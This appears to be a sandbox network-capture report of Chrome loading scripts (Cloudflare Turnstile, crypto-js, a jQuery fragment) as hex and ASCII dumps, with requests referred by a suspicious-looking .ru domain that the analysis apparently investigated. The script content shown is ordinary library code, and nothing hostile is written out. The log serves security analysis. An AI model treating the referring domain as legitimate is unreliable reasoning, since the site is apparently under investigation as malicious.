                                                                  2025-01-13 21:37:20 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                                  Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  10192.168.2.1649730104.18.94.414437000C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-13 21:37:20 UTC650OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                                                                  Host: challenges.cloudflare.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: cross-site
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: script
                                                                  Referer: https://m7sn.shaceshrov.ru/
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-01-13 21:37:20 UTC386INHTTP/1.1 302 Found
                                                                  Date: Mon, 13 Jan 2025 21:37:20 GMT
                                                                  Content-Length: 0
                                                                  Connection: close
                                                                  access-control-allow-origin: *
                                                                  cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                  cross-origin-resource-policy: cross-origin
                                                                  location: /turnstile/v0/b/e0c90b6a3ed1/api.js
                                                                  Server: cloudflare
                                                                  CF-RAY: 901886e89aed42e4-EWR
                                                                  alt-svc: h3=":443"; ma=86400


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  11192.168.2.1649731104.18.94.414437000C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-13 21:37:21 UTC649OUTGET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1
                                                                  Host: challenges.cloudflare.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: cross-site
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: script
                                                                  Referer: https://m7sn.shaceshrov.ru/
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-01-13 21:37:21 UTC471INHTTP/1.1 200 OK
                                                                  Date: Mon, 13 Jan 2025 21:37:21 GMT
                                                                  Content-Type: application/javascript; charset=UTF-8
                                                                  Content-Length: 47521
                                                                  Connection: close
                                                                  accept-ranges: bytes
                                                                  last-modified: Wed, 08 Jan 2025 13:42:47 GMT
                                                                  cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                  access-control-allow-origin: *
                                                                  cross-origin-resource-policy: cross-origin
                                                                  Server: cloudflare
                                                                  CF-RAY: 901886ecacfc432c-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  2025-01-13 21:37:21 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                  Data Ascii: "use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                  2025-01-13 21:37:21 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 41 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                  Data Ascii: e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                  2025-01-13 21:37:21 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 42 74 28 65 29 7c 7c 6a 74 28 65 2c 72 29 7c 7c 7a 74 28 65 2c 72 29 7c 7c 71 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                                  Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return Bt(e)||jt(e,r)||zt(e,r)||qt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                                                  2025-01-13 21:37:21 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 58 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                                  Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var De=300030;var Ve=300031;var j;(fu
                                                                  2025-01-13 21:37:21 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                                                  Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                                                  2025-01-13 21:37:21 UTC1369INData Raw: 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 4b 74 3d 33 30 30 2c 24 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61
                                                                  Data Ascii: ecute"],e)}var Kt=300,$t=10;function yt(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clea
                                                                  2025-01-13 21:37:21 UTC1369INData Raw: 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 75 2c 67 3d 4d 28 4e 72 2c 28 75 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 75 21 3d 3d 76 6f 69 64 20 30 3f 75 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 68 2c 6c 3d 4d 28 6b 72 2c 28 68 3d 28 6e 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 6e 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64
                                                                  Data Ascii: innerWidth<400,c=e.state===Ie.FAILURE_FEEDBACK||e.state===Ie.FAILURE_HAVING_TROUBLES,u,g=M(Nr,(u=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&u!==void 0?u:"nonexistent"),h,l=M(kr,(h=(n=e.displayLanguage)===null||n===void 0?void
                                                                  2025-01-13 21:37:21 UTC1369INData Raw: 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 53 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 53 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 53 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d 5b 6e 75 6c 6c 5d 3b 68 2e 70 75 73 68 2e 61 70 70 6c 79 28 68 2c 75 29 3b 76 61 72 20 6c 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 68 29 2c 70 3d 6e 65 77 20 6c 3b 72 65 74 75 72 6e 20 67 26 26 5a 28 70 2c 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 70 7d 2c 53 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 72 65 74 75 72 6e 20 63 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63
                                                                  Data Ascii: urn!1}}function Se(e,r,n){return je()?Se=Reflect.construct:Se=function(c,u,g){var h=[null];h.push.apply(h,u);var l=Function.bind.apply(c,h),p=new l;return g&&Z(p,g.prototype),p},Se.apply(null,arguments)}function ce(e){return ce=Object.setPrototypeOf?Objec
                                                                  2025-01-13 21:37:21 UTC1369INData Raw: 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 73 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 48 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 48 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 51 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 48 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63
                                                                  Data Ascii: ");throw new sr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function ze(e){return e.startsWith(He)?e.substring(He.length):null}function Q(e){return"".concat(He).concat(e)}function Rt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=doc
                                                                  2025-01-13 21:37:21 UTC1369INData Raw: 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b
                                                                  Data Ascii: rmOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  12192.168.2.1649732104.17.25.144437000C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-13 21:37:21 UTC386OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                                  Host: cdnjs.cloudflare.com
                                                                  Connection: keep-alive
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: none
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: empty
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-01-13 21:37:21 UTC960INHTTP/1.1 200 OK
                                                                  Date: Mon, 13 Jan 2025 21:37:21 GMT
                                                                  Content-Type: application/javascript; charset=utf-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Access-Control-Allow-Origin: *
                                                                  Cache-Control: public, max-age=30672000
                                                                  ETag: W/"61182885-40eb"
                                                                  Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                                  cf-cdnjs-via: cfworker/kv
                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                  Timing-Allow-Origin: *
                                                                  X-Content-Type-Options: nosniff
                                                                  CF-Cache-Status: HIT
                                                                  Age: 462052
                                                                  Expires: Sat, 03 Jan 2026 21:37:21 GMT
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HcqnVKy8G3cbTSSvhm867OPFNGdCMAM46U8hqiEQ2CojmEv2TC6y9RwOBmiQXS%2BJp55CfbEi6%2B5E0MY3PqvhLmTEsw0yYG%2BUWHT6bRQLxCCEk5upigDykYfghGlm%2BECCcoqq86u8"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                  Strict-Transport-Security: max-age=15780000
                                                                  Server: cloudflare
                                                                  CF-RAY: 901886ed499aefa1-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  2025-01-13 21:37:21 UTC409INData Raw: 33 39 37 37 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                                  Data Ascii: 3977!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                                  2025-01-13 21:37:21 UTC1369INData Raw: 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 63 72
                                                                  Data Ascii: of globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.cr
                                                                  2025-01-13 21:37:21 UTC1369INData Raw: 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42 79 74 65
                                                                  Data Ascii: .call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomByte
                                                                  2025-01-13 21:37:21 UTC1369INData Raw: 79 70 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b 61 3c
                                                                  Data Ascii: ypeof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<
